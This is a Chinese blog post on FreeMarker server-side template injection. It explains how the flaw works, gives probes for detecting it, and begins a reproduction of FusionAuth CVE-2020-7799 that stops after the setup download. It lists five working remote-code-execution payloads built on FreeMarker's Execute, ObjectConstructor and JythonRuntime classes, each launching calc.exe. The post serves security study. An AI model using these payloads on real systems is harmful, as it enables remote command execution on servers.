freemarker模板注入

最新推荐文章于 2024-05-22 14:28:57 发布
最新推荐文章于 2024-05-22 14:28:57 发布
阅读量2.1k 收藏 1
点赞数
文章标签: 安全 java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44522540/article/details/122844068
版权

一、freemarker和thymeleaf区别

freemarker这种编程式模板引擎,比如我们用一个判断会这么写

<#if ${isBig}>Wow!</#if>

而在thymeleaf中首先要考虑的问题是我的DOM是什么,而不是将 if 的逻辑放在哪里

在thymeleaf中判断会写出下面代码:

<div th:switch="${user.role}"> 
  <p th:case="'admin'">User is an administrator</p>
  <p th:case="#{roles.manager}">User is a manager</p>
  <p th:case="*">User is some other thing</p> 
</div>

二、关于FreeMarker模板注入

参考链接:https://zhuanlan.zhihu.com/p/432361789
(一)简介
FreeMarker 是一款模板引擎,即一种基于模板和需要改变的数据, 并用来生成输出文本( HTML 网页,电子邮件,配置文件,源代码等)的通用工具,其模板语言为 FreeMarker Template Language (FTL)。它不是面向最终用户的,而是一个Java类库,是一款程序员可以嵌入他们所开发产品的组件。
在这里插入图片描述
(二)常用的几种类型

文本:包括HTML标签与静态文本等静态内容,会原样输出;

插值:这部分的输出会被计算的数据来替换,使用${}这种语法;

标签:给FreeMarker的指示,可以简单与指令等同,不会打印在内容中,比如<#assign name=‘bob’>;

注释:由<#–和–>表示,不会被freemarker处理

(三)注入原理
服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

(四)漏洞发现

1、使用${77}或#{77},如果返回49,则基本可以确认存在模板注入漏洞。

2、使用特殊字符等方式去尝试报错:

${{<%[%’”}}%\

如果引发了报错,则可能存在问题,同时还可能爆出模板引擎是什么,有时甚至是哪个版本。

(五)参考payload
https://www.cnblogs.com/Eleven-Liu/p/12747908.html

1.<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

2.[#ftl][#assign value= "freemarker.template.utility.Execute"?new()]${ value("calc.exe")}

3.${"freemarker.template.utility.Execute"?new()("calc.exe")}

4.<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}

5.<#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe")

三、FusionAuthRCE(CVE-2020-7799)复现

转载于:https://blog.csdn.net/xuandao_ahfengren/article/details/107742893
(一)简介

FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。

(二)影响版本

FusionAuth <= 1.11.0

(三)环境搭建

1、下载 FusionAuth 1.10.0

wget https://storage.googleapis.com/inversoft_products_j098230498/products/fusionauth/1.10.0/fusionauth-app-1.10.0.zip

在这里插入图片描述

四、Freemarker模板注入(CVE-2020-7477)复现

https://blog.csdn.net/qq_35208730/article/details/119392499

freemarker快速入门:
https://segmentfault.com/a/1190000011768799?utm_source=tag-newest

hana-u
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Freemarker模板注入:CVE-2020-7477
守拙的博客
08-04 2177
一、漏洞名称: FusionAuth存在Freemarker模板注入导致远程命令执行 二、漏洞编号: CVE-2020-7477 三、漏洞描述: 在FusionAuth 1.11.0之前版本存在注入漏洞,经过身份验证的用户被允许编辑电子邮件模板或主题, 远程攻击者可利用该漏洞调用在系统上执行任意命令。 四、影响版本: FusionAuth <= 1.11.0 五、漏洞分析 通过对直接编辑freemarker模板,调用freemarker.template.utility.E
Java安全之freemaker模版注入
AS011x的博客
09-19 1773
FreeMarker 是一款模板引擎: 即一种基于模板和要改变的数据, 并用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)的通用工具。在线手册:什么是 FreeMarker?- FreeMarker 中文官方参考手册模板文件存放在Web服务器上,当访问指定模版文件时, FreeMarker会动态转换模板,用最新的数据内容替换模板中${...}的部分,然后返回渲染结果。${...}: FreeMarker将会输出真实的值来替换大括号内的表达式,这样的表达式被称为(插值)
freemarker ftl模板 格式、列表、图片
最新发布
Mr_Wanter
05-22 930
固定内容word生成:freemarker ftl模板 动态表格生成:https://blog.csdn.net/mr_wanter/article/details/126763195
FreeMarker入门到简要分析模版注入
weixin_65550121的博客
06-26 777
FreeMarker 是一款模板引擎: 即一种基于模板和要改变的数据, 并用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)的通用工具。它不是面向最终用户的,而是一个Java类库,是一款程序员可以嵌入他们所开发产品的组件。模板编写为FreeMarker Template Language (FTL)。它是简单的,专用的语言,不是像PHP那样成熟的编程语言。那就意味着要准备数据在真实编程语言中来显示,比如数据库查询和业务运算, 之后模板显示已经准备好的数据。
FreeMarker整合Spring 3
hoojo
04-19 2228
开发环境: System:Windows WebBrowser:IE6+、Firefox3+ JavaEE Server:tomcat5.0.2.8、tomcat6 IDE:eclipse、MyEclipse 8 开发依赖库: JavaEE5、Spring 3.0.0.M4、FreeMarker 2.3.16 Email:hoojo_@126.com Blog:http://blog.csdn.net/IBM_hoojo http://hoojo.cnblogs.com/ 1、 新建
Java FreeMarker模板引擎注入深入分析
蚁景网安学院
11-22 1149
最近和 F1or 大师傅一起挖洞的时候发现一处某 CMS SSTI 的 0day,之前自己在复现 jpress 的一些漏洞的时候也发现了 SSTI 这个洞杀伤力之大。今天来好好系统学习一手。
【漏洞通知】JeecgBoot 修复 Freemarker 模板注入漏洞, 漏洞危害等级:高危
JEECG官方博客
08-15 6076
【漏洞通知】JeecgBoot 修复Freemarker模板注入漏洞, 漏洞危害等级:高危
重写freemaker2.3.31的Configuration,修复 Freemarker 模板注入漏洞
08-15
直接重写 freemarker 的类 src/main/java/freemarker/template/Configuration.java 类,在实例化 Configuration 方法里面默认加入this.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);
java代码审计.Freemarker模板命令注入.分析
10-21
然而,在 OFCMS 1.1.2 版本中,开发者未对网站后台的“模板文件”功能处的“所存储的模板数据”做好过滤,导致攻击者可以使用 Freemarker 模板注入的方式获取 WebShell。 漏洞细节 该漏洞存在于 OFCMS 1.1.2 的...
基于Freemarker模板的代码生成器工具
07-03
本篇将重点介绍一款名为“基于Freemarker模板的代码生成器工具”,这是一款纯Java实现的工具,利用了Freemarker模板引擎的强大功能。 **一、Freemarker模板引擎** Freemarker是一个开源的模板语言,用于生成动态...
两种freemarker模板路径设置方法.docx
11-30
《两种Freemarker模板路径设置方法详解》 在Spring MVC框架中,Freemarker作为一款强大的模板引擎,常被用于动态生成HTML页面。本篇文章将详细介绍两种设置Freemarker模板路径的方法,帮助开发者更好地理解和应用。...
online-sale-example:简单的购物网站,后端使用Spring Boot框架构建, web层使用SpringMVC框架,数据访问使用MyBatis,验证、权限管理使用Spring Security框架,前端使用FreeMarker模板 ,注意到了对XSS、SQL注入、文件上传漏洞等常见Web漏洞的防护
05-14
online-sale-example 简单的购物网站,后端使用Spring Boot框架构建, web层使用SpringMVC框架,数据访问使用MyBatis,验证、权限管理使用Spring Security框架,前端使用FreeMarker模板 ,注意到了对XSS、SQL注入、文件上传漏洞等常见Web漏洞的防护
Freemarker利用模板生成word的使用(java生成word)
03-06
首先,理解Freemarker模板的基本概念。Freemarker模板是由HTML或XML格式的文本组成,其中包含了特殊的指令(如${}和[])来表示变量和控制结构。这些指令会被Freemarker引擎解析并替换为实际的值,生成最终的输出。 ...
FreeMarker学习笔记
热门推荐
阿霊羅的博客
05-08 5万+
Spring Boot推荐使用Thymeleaf来做页面模板引擎,所以又去瞅了瞅Thymeleaf,突然发现不是用过FreeMarker吗,虽然效率没有Thymeleaf高,但是还是觉得把之前学的FreeMarker相关知识记录下来,mark一下。OK,废话一堆,开始吧。一,介绍以下内容来自:http://www.oschina.net/p/freemarkerFreeMarker是一个模板引擎,一个基
修复 Freemarker 模板注入漏洞
kylerduane的博客
08-24 953
解决Freemarker 模板注入漏洞.,故可以使用我们自己定义的。
【代码审计】模板注入
TeamsSix 的 CSDN 空间
12-03 941
0x00 介绍 这里主要学习下 FreeMarker 模板注入FreeMarker 是一款模板引擎,FreeMarker 模板文件与 HTML 一样都是静态页面,当用户访问页面时,FreeMarker 引擎会进行解析并动态替换模板中的内容进行渲染,然后将渲染后的结果返回到浏览器中。 0x01 FreeMarker 模板 FreeMarker 模板语言(FreeMarker Template Language,FTL)由 4 个部分组成,分别如下: 文本:包括 HTML 标签与静态文本等静态内容,该部分
SpringBoot+FreeMarker 学习(七)FreeMarker变量类型及表达式
dengdaijc的专栏
10-14 944
介绍FreeMarker的基础变量类型及操作表达式的使用方法。
freemarker语法_CVE20207799:FreeMarker模板FusionAuth RCE复现
weixin_39983384的博客
11-30 274
点击上方蓝色字体关注我们,一起学安全!本文作者:?(团队复现组成员)本文字数:718阅读时长:2~3min声明:请勿用作违法用途,否则后果自负0x01 简介FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。0x02 漏洞概述一个有修改 email...
【Java代码审计】模板注入漏洞篇
大河之犬的博客
04-02 904
模板注入是一种安全漏洞,发生在应用程序使用模板引擎时。模板引擎通常用于动态生成Web页面、邮件、报告等内容,它们允许开发人员在模板中插入变量、表达式或代码片段,并在生成输出时进行解析和执行。模板注入漏洞通常发生在模板引擎对用户提供的输入进行不充分或不正确的验证和过滤时,导致恶意用户能够注入恶意代码并执行它们。
springboot 使用XDocReport和FreeMarker模板生成带页数和总页数的word
05-31
您可以使用XDocReport和FreeMarker模板来生成带页数和总页数的Word文档。以下是一个示例代码: 1. 添加以下依赖项到您的Spring Boot项目中: ```xml <groupId>fr.opensagres.xdocreport <artifactId>xdocreport...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值